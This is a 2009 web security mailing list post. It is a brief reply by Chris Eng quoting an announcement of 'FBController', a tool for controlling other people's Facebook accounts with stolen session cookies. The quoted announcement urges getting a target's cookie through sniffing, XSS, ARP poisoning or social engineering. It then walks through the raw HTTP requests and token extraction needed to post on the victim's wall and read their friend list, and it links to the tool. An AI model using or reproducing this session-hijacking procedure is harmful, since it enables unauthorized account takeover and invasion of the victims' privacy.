[WEB SECURITY] FBController - (Facebook Control Utility) version 1.0

Chris Eng ceng at Veracode.com
Thu Apr 30 16:59:47 EDT 2009


Apologies if I'm overlooking something here, but if you have the victim's Facebook cookie, why wouldn’t you simply use an HTTP proxy or Firefox plugin to inject the stolen cookie into a request for /home.php, and then let the web browser do the rest of the work calculating/updating all the tokens?




> -----Original Message-----
> From: QUAKER DOOMER [mailto:quakerdoomer at inbox.lv]
> Sent: Thursday, April 30, 2009 4:32 PM
> To: websecurity at webappsec.org
> Subject: [WEB SECURITY] FBController - (Facebook Control Utility) version 1.0
> 
> FBController - The Ultimate Utility to Control Facebook accounts without the
> Password.
> 
> Let me clear that this utility WON'T  hack/crack Facebook accounts.
> The utility will need biscuits/cookies instead of the password.
> 
> Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-
> Sniffing,
> scroogle search, anyhow !
> Once you have the cookies you can use FBController and have Full control over
> the
> target's Facebook account.
> 
> ==============================================================
> Login to your Facebook account and sniff your cookie OR collect a few live
> Facebook
> Biscuit/s of your Target/s.
> 
> 1 ] Generate a OG 10 Digit Unix Timestamp. If possible not way back older
> than
> FaceBook.COM's current SYSTIME.
> 
> 
> 2 ] Send a GET Request to www.facebook.com port 80 after calculating the
> required
> variables (below)
> [code]
> GET /home.php? HTTP/1.1
> Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D;
> cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859;
> login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
> %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
> STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
> FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
> [/code]
> 
> 
> 3 ] From the Response Obtained :
> Gain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].
> 
> Calculating the new nctr[ct] :
> Add +79 to Original Timestamp. Append 3 more digits to its end.
> 
> Calculating &oldest= :
> Deduct 144556 from Original Timestamp.
> 
> Calculating composer_id :
> Search for
> UIComposer_STATE_PIC_OUTSIDE\" id=\"
> This will be your composer_id at the later stage in the Status Update Page /
> Other
> Post Request
> 
> Calculating post_form_id
> Search for
> post_form_id:"
> This will be your post_form_id at the later stage in the Status Update Page /
> Other
> Post Request
> 
> Calculating fb_dtsg
> Right after post_form_id (explained just above this section) you can locate
> fb_dtsg.
> Else Search for
> ,fb_dtsg:"
> This will be your fb_dtsg at the later stage in the Status Update Page /
> Other Post
> Request
> 
> Your login_x actually looks like
> a:2:{s:5:"email";s:13:"you at youremailprovider.com";s:19:"remember_me_default";
> b:0;}
> But keep it unchanged in the hex format.
> 
> 
> 4 ] Send a GET Request like below with the above calculated variables :
> [code]
> GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-
> CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-
> STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-
> FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750
> HTTP/1.1
> Accept: */*
> Accept-Language: en-US
> XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> x-svn-rev: 161013
> UA-CPU: x86
> XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> Host: www.facebook.com
> Connection: Keep-Alive
> Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D;
> login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
> %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
> STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
> FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F
> %2Fwww.facebook.com%2Fhome.php
> [/code]
> 
> 5 ] In the output :
> Search for  Env[\"nctrlid\"]=\"
> This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)
> 
> 
> 6 ] Generate a new POST Request with the above calculated new variables :
> [code]
> POST /updatestatus.php HTTP/1.1
> Accept: */*
> Accept-Language: en-US
> XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> x-svn-rev: 161013
> Content-Type: application/x-www-form-urlencoded
> UA-CPU: x86
> XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
> User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
> Host: www.facebook.com
> Content-Length: 343
> Connection: Keep-Alive
> Cache-Control: no-cache
> Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
> BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
> PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA;
> test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
> BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D;
> login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
> %40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
> %3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES);
> c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-
> HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A
> %2F%2Fwww.facebook.com%2Fhome.php
> 
> action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-
> ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-
> STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-
> FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-
> RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-
> CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-
> FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-
> EXPLAINED-In-POINT-3)375
> [/code]
> 
> 
> 7 ] Use the above variables to view any content with the appropriate GET /
> requests
> 
> 
> 8 ] For POST-ing making changes, GOTO 2 ] and REDO :-)
> 
> 
> Looks like loads of HardWork ha ?
> If you don't want to do all this manually, then you can download this TooL
> named
> FBController (FACEBOOK CONTROLLER)  written
> by me.
> Till now FBController version 1.0 uses your Target's provided cookie and only
> :
> 
> A > Downloads the HomePage.
> B > Allows you to Update the Target's Wall and
> C > Retrieve your Target's Friend's List
> 
> There are many APIs available to write apps and 3rd party Tools for FB in
> Java,
> Perl, .NET, etc.
> 
> FBConTroller was entirely written without knowing any of Facebook's Dev
> API's.
> Considering the above alongwith Facebook's complexity, the next version might
> take
> some time to get released
> 
> Many more features to come in version 2.0
> 
> A 26th April Release !
> Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th
> April
> 2009.
> 
> Happy Controlling ! :-)
> ==============================================================
> 
> Download : http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-
> facebook-
> controller-the-ultimate-facebook-controller-without-the-pa
> 
> The Latest available release is FBCONTROLLER version 1.0
> Coded by : Azim Poonawala (QUAKERDOOMER)
> Author's website : http://solidmecca.co.nr
> 
> Regards,
> QUAKERDOOMER
> 
> 
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
> 
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> 
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
> 
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list